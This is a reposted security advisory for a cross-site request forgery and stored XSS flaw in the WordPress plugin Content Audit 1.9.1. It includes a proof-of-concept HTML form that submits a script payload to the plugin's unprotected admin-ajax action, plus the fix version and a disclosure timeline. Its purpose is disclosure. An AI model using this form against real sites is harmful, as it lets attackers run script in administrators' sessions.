Advertisement






WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting

CVE Category Price Severity
CVE-XXXX-XXXX CWE-352 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2017-09-28
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090221

Below is a copy:

WordPress Content Audit 1.9.1 Cross Site Request Forgery / Cross Site Scripting
Details
================
Software: Content Audit
Version: 1.9.1
Homepage: https://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/csrf-xss-content-audit/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Vulnerability
================
The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.

Proof of concept
================

Install/activate the plugin
Make sure you have a post with ID=2 (or edit the HTML provided below)
Settings > Content Audit > select at least aPagesa for aAudited content typesa
Visit a page containing the below HTML
Click submit
VisitA http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload

<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit\">
 <input type=\"text\" name=\"post_ids[]\" value=\"2\">
 <input type=\"text\" name=\"_content_audit_owner\" value=\"Elliot Alderson\">
 <input type=\"text\" name=\"_content_audit_expiration_date\" value=\"2020-01-01\">
 <input type=\"text\" name=\"_content_audit_notes\" value=\"&lt;script>alert(1)&lt;/script>\">
 <input type=\"submit\">
</form>
A 

Mitigations
================
Upgrade to version 1.9.2 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2017-08-21: Discovered
2017-09-08: Reported to vendor by email
2017-09-08: First response from vendor
2017-09-08: Vendor reports fixed in 1.9.2
2017-09-26: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum